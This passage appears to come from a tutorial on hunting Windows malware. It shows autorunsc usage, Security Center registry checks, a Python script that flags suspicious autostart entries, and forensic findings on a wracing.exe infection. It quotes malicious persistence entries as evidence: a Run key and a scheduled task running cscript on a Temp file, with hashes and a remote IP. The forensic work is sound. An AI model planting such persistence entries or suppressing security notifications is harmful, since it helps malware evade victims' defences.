With this sample output, we see that “wracing.exe” is in the “C:\Documents and Settings\Administrator\Local Settings\Temp” directory. We suggest you review the file listing of this directory, sorted by file creation time as well to see what other artifacts may be present from the same timeframe.

Malware will often modify the system security settings held in the Registry to make removal and remediation more difficult, for example by disabling the firewall or antivirus and other critical system security alerting mechanisms.

The Windows Security Center settings are common targets. They control whether you are notified when something happens to your antivirus, firewall, Windows Updates, etc. A value of "0" means the "disable notification" flag is off, so the feature is still active and you will be warned if your antivirus or firewall is turned off. A value of "1" means the flag is on, and the affected item will no longer be reported in the Windows Security Center as an item of concern when it is disabled.

To review the Registry run:
regedit

Common items which are disabled by malware include entries similar to those found below:

HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center
    FirstRunDisabled            REG_DWORD       0x1
    AntiVirusDisableNotify      REG_DWORD       0x0
    FirewallDisableNotify       REG_DWORD       0x0
    UpdatesDisableNotify        REG_DWORD       0x0
    AntiVirusOverride           REG_DWORD       0x0
    FirewallOverride            REG_DWORD       0x0

If the AntiVirusDisableNotify, FirewallDisableNotify, UpdatesDisableNotify, AntiVirusOverride or FirewallOverride values are set to "1", the corresponding Security Center warning has been suppressed and you should ask why.

Examine Scheduled Tasks


In the prior article we used two native Windows binaries to investigate this data, the at command and schtasks command. In this article everything can be achieved with one tool--autorunsc. This is the same tool used above to check the registry entries and startup directory. It can be downloaded at http://technet.microsoft.com/en-us/sysinternals/bb963902.
autorunsc -t >> output.txt

Sample Output
C:\Documents and Settings\Administrator>autorunsc -t

Sysinternals Autoruns v11.21 - Autostart program viewer
Copyright (C) 2002-2012 Mark Russinovich and Bryce Cogswell
Sysinternals - www.sysinternals.com

Task Scheduler
   ezyme.job
   C:\WINDOWS\system32\csript.exe //E:javascript C:\WINDOWS\TEMP\ezmye.zbz
   C:\Windows\temp\ezmye.zbz
   aa186d30801500ca22b83c17d42ea743 (MD5)
   304b5e0352b846cce0b5403392a7c49e55f60ad1 (SHA-1)
   -snip-

This output is far superior to that of at or schtasks because it provides the full path to the binary, the arguments, and the MD5 and SHA-1 hashes! Wow. Note what the sample shows: a scheduled task that feeds a script engine a file with an unfamiliar extension sitting in C:\WINDOWS\TEMP is suspicious on its face.
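As an added example that covers both the autorunsc output above and the creation-time dir listings from the file location section (it is not part of the original article or of Autoruns), the script below parses saved autorunsc text output, flags autostart entries whose image sits in a user-writable location or carries an extension no normal autostart binary has, and then, as suggested for wracing.exe above, looks the image up in a saved dir /t:c listing and reports every file created in the same folder within ten minutes of it. The two inputs are constructed from the listings shown on this page (trimmed, with only the MD5 kept); the indentation of the autoruns text, the path markers, the extension list and the ten-minute window are assumptions to adjust for your own output.

```python
import re
from datetime import datetime, timedelta

USER_WRITABLE_MARKERS = ("\\documents and settings\\", "\\users\\", "\\temp\\", "\\appdata\\")
# Extensions an autostart image normally carries; anything else (a .zbz "script") is odd.
NORMAL_EXTENSIONS = (".exe", ".dll", ".sys", ".ocx", ".cpl", ".scr", ".bat", ".cmd", ".vbs", ".js", ".lnk")
HASH_SUFFIXES = ("(MD5)", "(SHA-1)", "(SHA-256)")

# Constructed sample modelled on the autorunsc -l and -t output above (trimmed to one hash;
# assumes entry names are indented less than their detail lines, as in the -l listing).
AUTORUNS_OUTPUT = r"""
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
   ctfmon.exe
     C:\WINDOWS\system32\ctfmon.exe
     CTF Loader
     c:\windows\system32\ctfmon.exe
     5f1d5f88303d4a4dbc8e5f97ba967cc3 (MD5)
   wracing
     C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys
     c:\documents and settings\administrator\local settings\temp\wracing.exe
     862cac1ffae3ca515f1c8588e3c3c394 (MD5)

Task Scheduler
   ezyme.job
     C:\WINDOWS\system32\cscript.exe //E:javascript C:\WINDOWS\TEMP\ezmye.zbz
     c:\windows\temp\ezmye.zbz
     aa186d30801500ca22b83c17d42ea743 (MD5)
"""

# Constructed sample modelled on the dir /a /s /o:d /t:c "%USERPROFILE%" listing above.
DIR_OUTPUT = r"""
 Directory of C:\Documents and Settings\Administrator\Local Settings\Temp

01/07/2010  07:47 PM            14,010 ASPNETSetup_00002.log
09/13/2010  09:24 PM             8,141 lick_me.jpg
09/13/2010  09:24 PM            37,376 wracing.exe
09/13/2010  09:24 PM            28,160 wracing.dll
09/13/2010  09:28 PM    <dir>          plugtmp
03/23/2012  02:54 PM               104 pdracing.tmp
"""

DIR_ROW = re.compile(r"^(\d{2}/\d{2}/\d{4})\s+(\d{2}:\d{2} [AP]M)\s+(<DIR>|[\d,]+)\s+(.+?)\s*$", re.I)

def parse_dir(text):
    """Map lowercased full path -> (creation time, is_dir) from a recursive dir /t:c listing."""
    entries, folder = {}, ""
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("Directory of "):
            folder = stripped[len("Directory of "):].rstrip("\\").lower()
            continue
        m = DIR_ROW.match(line)
        if m and m.group(4) not in (".", ".."):
            created = datetime.strptime(f"{m.group(1)} {m.group(2)}", "%m/%d/%Y %I:%M %p")
            entries[f"{folder}\\{m.group(4).lower()}"] = (created, m.group(3).lower() == "<dir>")
    return entries

def parse_autoruns(text):
    """Return one dict per autostart entry: location, name, command, image."""
    entries, location, name_indent = [], None, None
    for line in text.splitlines():
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        if indent == 0:                                      # location (registry key, folder, ...)
            location, name_indent = line.strip(), None
        elif name_indent is None or indent <= name_indent:   # entry name
            name_indent = indent
            entries.append({"location": location, "name": line.strip(), "details": []})
        else:                                                # command, description, image, hashes
            entries[-1]["details"].append(line.strip())
    for e in entries:
        body = [d for d in e.pop("details") if not d.endswith(HASH_SUFFIXES)]
        # autorunsc prints the launch command first and the resolved image path last
        e["command"], e["image"] = (body[0], body[-1]) if body else ("", "")
    return entries

def hunt_persistence(autoruns_text, dir_text, window=timedelta(minutes=10)):
    """Flag suspicious autostart entries and list files created around the same time."""
    listing, findings = parse_dir(dir_text), []
    for e in parse_autoruns(autoruns_text):
        image, reasons = e["image"].lower(), []
        if any(marker in image for marker in USER_WRITABLE_MARKERS):
            reasons.append("image in user-writable location")
        if image and not image.endswith(NORMAL_EXTENSIONS):
            reasons.append("unusual image extension")
        if not reasons:
            continue
        neighbours = []
        if image in listing:      # files born in the same folder within the window
            created, folder = listing[image][0], image.rsplit("\\", 1)[0]
            neighbours = sorted(p.rsplit("\\", 1)[1] for p, (t, _) in listing.items()
                                if p != image and p.rsplit("\\", 1)[0] == folder and abs(t - created) <= window)
        findings.append({"location": e["location"], "name": e["name"], "image": e["image"],
                         "command": e["command"], "reasons": reasons, "neighbours": neighbours})
    return findings

if __name__ == "__main__":
    for f in hunt_persistence(AUTORUNS_OUTPUT, DIR_OUTPUT):
        print(f["location"], f["name"], "; ".join(f["reasons"]), f["neighbours"])
```

The neighbour list is the part worth reading closely: a dropper rarely writes a single file, so the .dll and the decoy image created in the same minute as wracing.exe are exactly the companions the text above tells you to go looking for.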

Initial Analysis of the Results


Analysis often takes far longer than the time required to run the commands. However, according to the sample information above, it appears that we have at least two infections on this host. The data below ties everything together.

Malicious software is present in the process list here:

Name                Pid Pri Thd  Hnd   Priv        CPU Time    Elapsed Time
wracing            1680   8   1   19    324     0:00:41.609     4:05:23.687

and here:
C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe [1680]
  "C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe"

It also has a connection out to a known bad site:

Process Name      : wracing.exe
Process ID        : 1680
Remote Port       : 443
Remote Port Name  : https
Remote Address    : 63.232.79.43
Process Path      : C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe

Malicious files are present in the following directory:

C:\Documents and Settings\Administrator\Local Settings\Temp

09/13/2010  09:24 PM             8,141 lick_me.jpg
09/13/2010  09:24 PM            37,376 wracing.exe
09/13/2010  09:24 PM            28,160 wracing.dll

The persistence mechanism is via the registry:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
wracing
     C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys
     c:\documents and settings\administrator\local settings\temp\wracing.exe
     862cac1ffae3ca515f1c8588e3c3c394 (MD5)
     fb38ac1459da93f36be0af0999618a2f643e2fc8 (SHA-1)
     ede018f2be5f4655d71c0b02db394b4ff332aacc508915de47bcaf2c1db0cc78 (SHA-256)
-snip-

There is also a second (most likely unrelated) suspicious task that runs via the scheduler:

Task Scheduler
   ezyme.job
   C:\WINDOWS\system32\csript.exe //E:javascript C:\WINDOWS\TEMP\ezmye.zbz
   C:\Windows\temp\ezmye.zbz
   aa186d30801500ca22b83c17d42ea743 (MD5)
   304b5e0352b846cce0b5403392a7c49e55f60ad1 (SHA-1)
   -snip-
   16:33:00, 3/23/2012

Recovery


Fortunately antivirus programs protect us from most of the threats out there, however the bad guys are constantly finding new ways to infect our systems with new malware. Once your system is infected, the only way to be truly certain you have found all of the components of the malware is to re-image your system. (Don't just re-format the hard disk: some malware, such as TDSS, now infects the disk boot records, and formatting a partition does not necessarily rewrite the master boot record.)

If you decide to go the route of manual cleanup, here are some helpful thoughts to speed you on your journey:

  • If you find your system is infected, the first thing to do is disconnect it from the Internet as quickly as possible, to prevent additional malware from being placed on it and to limit the potential data loss.
  • Make a backup. Note that some malware will also infect any USB device that is plugged in, so inserting a USB hard drive to perform a backup may infect it with an active infection component.
  • Turn off System Restore. If the malware infected any of the critical operating system areas, the restore points may contain copies of the infection, which you could inadvertently bring back if you recover the OS from an infected restore point.
    • My Computer -> Properties -> click the System Restore tab -> select the "Turn off System Restore" check box
  • Using a known clean system, change all of your passwords. Credentials are a common target for malware and are then used by the bad guys to access your accounts, perform fraudulent activities, etc.
  • Install the latest updated antivirus and anti-spyware software and scan your system to clean the malware or spyware; be sure to configure the software to prompt you before it takes action on any suspicious files it finds.
  • Reboot, update all of the antivirus signatures again, and rescan your system with the antivirus and anti-spyware software.
  • If your system is still affected, a running process may be protecting the infection. Boot from a live CD such as BartPE (http://www.nu2.nu/pebuilder/) so that the process is not running; tools such as HijackThis can then be used to clean the system while the malware is inactive.


Food for Thought


If the infection uses rootkit technology, the non-native tools stand a better chance than the native ones of revealing that something is amiss, especially where a tool gathers its information without going through the Windows API calls that the rootkit hooks. Keep in mind that a rootkit which hooks the same interfaces a tool relies on will hide from that tool as well, so a clean result from one tool is not proof of a clean system. If nothing shows up as an indicator of compromise, but your relatives are still convinced they are owned, they may simply have a healthy dose of paranoia. Either way, they may have to take it in to a shop or wait until the next holiday gathering when you have your fingers on the keyboard for a more in-depth analysis. As always, happy hunting!